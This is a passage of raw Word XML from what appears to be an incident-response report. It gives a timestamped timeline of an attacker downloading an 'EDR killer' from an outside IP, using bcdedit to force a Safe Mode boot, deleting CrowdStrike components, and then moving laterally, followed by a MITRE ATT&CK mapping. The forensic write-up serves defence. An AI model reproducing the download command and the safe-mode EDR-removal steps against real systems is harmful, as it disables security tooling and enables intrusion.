        <w:t>. Action: BLOCKED. Severity: CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E2B076" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRPr="00FB2C15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>CrowdStrike EDR successfully detected and blocked the tampering attempt. However, the attacker adapted their technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9854E5" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 4: Safe Mode Bypass (10:49:35 - 10:49:55)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD873E" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">03/02/2026 10:49:35 - PowerShell downloads EDR removal tool: Uri="http://185.220.101.42/tools/edr_killer.exe" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OutFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="C:\Windows\Temp\winupdate.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3A3C41" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">03/02/2026 10:49:42 - PowerShell executes: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcdedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /set {current} </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>safeboot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> network (configures system to boot into Safe Mode with Networking, where EDR kernel drivers will NOT load)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E263E36" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:49:43 - Windows Event ID 4688 confirms bcdedit.exe executed with admin privileges, parent process powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D8B16" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRPr="00FB2C15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">03/02/2026 10:49:45 - CROWDSTRIKE EDR ALERT (Application Event ID 1000): Detection: Boot Configuration Modification. Technique: T1562.009 (Safe Mode Boot). Process: bcdedit.exe. Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>safeboot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> network. Severity: CRITICAL. Action: Logged (cannot prevent </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>bcdedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> system command)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DB34A" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:49:48 - Registry modified (Sysmon Event ID 13): HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SafeBoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Network\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WinUpdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> set to C:\Windows\Temp\winupdate.exe (ensuring EDR killer runs on Safe Mode boot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C141818" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:49:53 - PowerShell forces system reboot: Restart-Computer -Force -Timeout 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ED0E16" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">03/02/2026 10:49:54-55 - System shutdown initiated (Windows Event ID 1074, System Event ID 1074). Shutdown Type: Restart. Initiated by: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sarah.mitchell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Reason: Forced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364232C4" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 5: EDR Removal in Safe Mode (10:51:06 - 10:51:51)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A25BB3" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:51:06 - System boots (Event ID 6013): Boot Mode: Safe Mode with Networking. Uptime: 5 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A4BB59" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRPr="00FB2C15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>03/02/2026 10:51:11 - System Event ID 12 confirms: Boot Mode: Safe Mode with Networking. EDR drivers NOT loaded (kernel drivers disabled in Safe Mode).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B3E639" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRPr="00FB2C15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>03/02/2026 10:51:15 - Sysmon Event ID 1 shows winupdate.exe (EDR killer) executing as NT AUTHORITY\SYSTEM from Safe Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D940EF2" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRPr="00FB2C15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">03/02/2026 10:51:20 - System Event ID 7045: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>CSFalconService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> DELETED. Start Type: DELETED. Attacker tool removed EDR service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E2584" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:51:22 - Sysmon Event ID 23 (File Delete): C:\Windows\System32\drivers\CSAgent.sys deleted (EDR kernel driver)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC21D5B" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:51:23 - Sysmon Event ID 23: C:\Program Files\CrowdStrike\CSFalconContainer.exe deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AED152F" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:51:26 - PowerShell recursively removes: C:\Program Files\CrowdStrike\ (all EDR artifacts deleted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04527FEC" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">03/02/2026 10:51:31 - bcdedit.exe removes Safe Mode configuration: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcdedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>deletevalue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {current} </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>safeboot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C023E06" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:51:36 - winupdate.exe self-deletes (Sysmon Event ID 23)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D125C59" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:51:37 - Registry cleanup (Sysmon Event ID 12): HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SafeBoot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Network\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WinUpdate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D9906" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:51:41-42 - System restart to normal mode (Event ID 1074)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B945B16" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>03/02/2026 10:51:51 - Final cleanup: CSFalconService.exe binary deleted (Sysmon Event ID 23)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35774804" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 6: Post-Compromise Activity (10:52:02 onwards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C128005" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">03/02/2026 10:52:02 - System boots into Normal mode. Windows Event ID 4624: User </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sarah.mitchell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> auto-logon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC60CFE" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRPr="00FB2C15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>03/02/2026 10:52:40 - PowerShell confirms EDR removal: Get-Service | Name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>CSFalcon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>*" | ERROR: Cannot find service - EDR successfully removed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ED498F" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRPr="00FB2C15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>03/02/2026 10:52:44 - System Event ID 12: Boot Mode: Normal. EDR Status: NOT PRESENT. System vulnerable to attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2BD242" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRPr="00FB2C15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">03/02/2026 10:52:56 - System Event ID 7000: Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>CSFalconService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> failed to start. Error: The system cannot find the file specified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522E099D" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRPr="00FB2C15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>03/02/2026 10:52:56 - Lateral movement initiated to 10.50.10.22 using stolen Domain Admin credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B33AB7E" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRPr="00FB2C15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2C15">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>With EDR removed and Domain Admin access, the attacker proceeded with data exfiltration (245 MB) and ransomware deployment (1,247 files encrypted on FILESERVER01).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1846EA5A" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="007D40BD">
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73992F8C" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE ATT&amp;CK FRAMEWORK MAPPING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C1F82E" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5AF352" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1566.001 - Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Attachment (OUTLOOK.EXE spawned PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E357F3C" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255EF099" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1059.001 - PowerShell (obfuscated, fileless)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4640E237" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1204.002 - User Execution: Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42334081" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433E7D9D" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1027 - Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F65C753" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1036.005 - Masquerading: Match Legitimate Name (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as svchost.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9CAC72" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1055 - Process Injection (reflective DLL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B905D78" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1562.001 - Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Disable/Modify Tools (EDR tampering attempts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5E8614" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1562.009 - Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Safe Mode Boot (EDR kernel driver bypass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314AA407" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1620 - Reflective Code Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17837690" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Credential Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296839DF" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1003.001 - OS Credential Dumping: LSASS Memory (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - CRITICAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E80E566" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ED352C" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1057 - Process Discovery (enumerating security products)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141DBEE4" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1007 - System Service Discovery (CrowdStrike service enumeration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5430E580" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1082 - System Information Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E153F0" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495E025E" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">T1547.001 - Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Registry Run Keys (Safe Mode startup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368DA472" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EA6A26" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1078.002 - Valid Accounts: Domain Accounts (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jennifer.hayes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F7319C" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1737069D" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>T1021.001 - Remote Desktop Protocol</w:t>
      </w:r>
    </w:p>
